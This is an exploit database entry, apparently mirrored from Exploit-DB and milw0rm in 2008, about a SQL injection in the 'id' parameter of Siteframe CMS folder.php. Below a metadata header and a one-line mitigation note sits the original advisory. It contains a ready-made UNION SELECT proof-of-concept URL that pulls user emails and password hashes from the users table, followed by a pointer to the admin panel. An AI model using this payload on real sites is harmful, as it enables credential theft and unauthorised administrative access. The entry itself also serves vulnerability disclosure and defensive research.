SQL-Injection in Siteframe CMS (all versions)

vendor:

CMS

by:

n0ne

9.3

CVSS

HIGH

SQL Injection

CWE

Product Name: CMS

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SQL-Injection in Siteframe CMS (all versions)

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable script. The vulnerable parameter is 'id' which is not properly sanitized before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can exploit this vulnerability to gain access to the administrator panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#################################################
#################################################
##SQL-Injection in Siteframe CMS (all versions)##
#################################################
#################################################

##############
#Author: n0ne##############
#E-Mail: qwerty@ebanat.com#
###########################

###############################
#Vulnerable script: folder.php#
#Vulnerable var: id############
####################

########################################
#CMS Homepage: http://www.siteframe.org#
########################################

##########################################################################################################################################################
#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--#                                                                                                                                                                                           ########################################################################################################################
##########################################################################################################################################################

#########################################################################################################
#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
#########################################################################################################

###################################################
#############Greetz to www.antichat.ru#############
############And personally to Nilson ;)############
###################################################

# milw0rm.com [2008-07-18]